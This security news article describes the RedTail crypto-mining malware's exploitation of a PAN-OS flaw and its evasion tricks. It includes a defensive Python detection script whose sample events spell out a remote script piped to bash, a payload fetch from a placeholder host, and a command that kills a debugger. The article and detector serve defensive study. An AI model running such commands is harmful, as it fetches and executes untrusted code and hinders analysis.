The threat actors behind the RedTail cryptocurrency mining malware have added a recently disclosed security flaw affecting Palo Alto Networks firewalls to their exploit arsenal.
The addition of the PAN-OS vulnerability to their toolkit has been accompanied by updates to the malware, which now incorporates new anti-analysis techniques, according to findings from web infrastructure and security company Akamai.
“The attackers have taken a step forward by employing private crypto-mining pools for greater control over mining outcomes despite the increased operational and financial costs,” security researchers Ryan Barnett, Stiv Kupchik, and Maxim Zavodchik said in a technical report shared with The Hacker News.
The infection sequence discovered by Akamai exploits a now-patched vulnerability in PAN-OS tracked as CVE-2024-3400 (CVSS score: 10.0) that could allow an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Successful exploitation is followed by the execution of commands designed to retrieve and run a bash shell script from an external domain that, in turn, is responsible for downloading the RedTail payload based on the CPU architecture.
Other propagation mechanisms for RedTail involve the exploitation of known security flaws in TP-Link routers (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887), and VMware Workspace ONE Access and Identity Manager (CVE-2022-22954).
RedTail was first documented by security researcher Patryk Machowiak in January 2024 in connection with a campaign that exploited the Log4Shell vulnerability (CVE-2021-44228) to deploy the malware on Unix-based systems.
Then in March 2024, Barracuda Networks disclosed details of cyber attacks exploiting flaws in SonicWall (CVE-2019-7481) and Visual Tools DVR (CVE-2021-42071) to install Mirai botnet variants, as well as shortcomings in ThinkPHP to deploy RedTail.
The latest version of the miner, detected in April, packs in significant updates in that it includes an encrypted mining configuration that is used to launch the embedded XMRig miner.
Another notable change is the absence of a cryptocurrency wallet, indicating that the threat actors may have switched to a private mining pool or a pool proxy to reap financial benefits.
“The configuration also shows that the threat actors are trying to optimize the mining operation as much as possible, indicating a deep understanding of crypto-mining,” the researchers said.
“Unlike the previous RedTail variant reported in early 2024, this malware employs advanced evasion and persistence techniques. It forks itself multiple times to hinder analysis by debugging its process and kills any instance of [GNU Debugger] it finds.”
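As an added illustration of how a defender might look for the behaviours described above (a remote script piped into a shell, an architecture-specific payload fetch, a process that kills GDB, and a binary that forks copies of itself), here is example detection logic written for this article; it is not Akamai's code, and the process events, command lines and host name are constructed placeholders.

```python
"""Heuristic checks over process-execution events for RedTail-like behaviour.
The events below are constructed samples in a generic (pid, ppid, comm, cmdline)
shape; the host example.invalid is a placeholder, not a real indicator."""
import re
from collections import Counter

SAMPLE_EVENTS = [
    (4101, 1,    "php-fpm", "php-fpm: pool www"),
    (4102, 4101, "sh",      "sh -c 'curl -fsSL http://example.invalid/x.sh | bash'"),
    (4103, 4102, "bash",    "bash -s"),
    (4104, 4103, "wget",    "wget -q http://example.invalid/redtail.x86_64 -O /tmp/.r"),
    (4105, 4103, "pkill",   "pkill -9 gdb"),
    (4106, 4103, ".r",      "/tmp/.r"),
    (4107, 4106, ".r",      "/tmp/.r"),   # the miner forking copies of itself
    (4108, 4106, ".r",      "/tmp/.r"),
    (4109, 4106, ".r",      "/tmp/.r"),
    (4110, 4106, ".r",      "/tmp/.r"),
    (4201, 1,    "sshd",    "sshd: user [priv]"),  # benign noise
]

# curl/wget output piped straight into sh or bash
DOWNLOAD_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# a fetched file named after a CPU architecture (payload chosen per arch)
ARCH_PAYLOAD = re.compile(r"\b(curl|wget)\b.*\.(x86_64|i686|arm|aarch64|mips)\b")
# any attempt to terminate the GNU debugger
KILL_DEBUGGER = re.compile(r"\b(pkill|killall)\b.*\bgdb\b")


def detect(events, fork_threshold=4):
    """Return (pid, reason) findings for the events; order follows the input."""
    by_pid = {pid: (comm, cmd) for pid, _, comm, cmd in events}
    self_forks = Counter()  # parent pid -> children sharing its command name
    findings = []
    for pid, ppid, comm, cmd in events:
        if ppid in by_pid and by_pid[ppid][0] == comm:
            self_forks[ppid] += 1
        if DOWNLOAD_AND_RUN.search(cmd):
            findings.append((pid, "remote script piped to shell"))
        if ARCH_PAYLOAD.search(cmd):
            findings.append((pid, "architecture-specific payload download"))
        if KILL_DEBUGGER.search(cmd):
            findings.append((pid, "debugger killed"))
    for ppid, n in self_forks.items():
        if n >= fork_threshold:
            findings.append((ppid, f"spawned {n} copies of itself"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The fork threshold is deliberately a parameter: legitimate pre-forking servers also spawn same-named children, so the count should be tuned per host rather than treated as proof on its own.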
Akamai described RedTail as having a high level of polish, an aspect not commonly observed among cryptocurrency miner malware families in the wild.
“The investments required to run a private crypto-mining operation are significant, including staffing, infrastructure, and obfuscation,” the researchers concluded. “This sophistication may be indicative of a nation-state-sponsored attack group.”